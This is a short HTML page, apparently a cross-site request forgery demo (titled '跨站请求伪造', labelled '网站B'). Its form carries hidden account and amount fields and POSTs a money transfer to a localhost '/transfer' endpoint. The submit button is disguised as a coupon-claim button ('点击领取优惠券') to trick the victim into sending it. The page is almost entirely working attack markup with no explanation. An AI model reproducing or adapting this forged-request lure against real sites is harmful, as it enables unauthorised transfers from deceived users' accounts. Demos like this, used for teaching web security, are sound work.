<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>跨站请求伪造</title>
</head>

<body>
    <h1>网站B</h1>
    <hr>
    <form method="post" action="http://localhost:3500/transfer">
        <p><input type="hidden" name="account" id="account" value="9999999999999"></p>
        <p><input type="hidden" name="money" id="money" value="2000"></p>
        <p>
            <input type="submit" value="点击领取优惠券">
        </p>
    </form>

</body>

</html>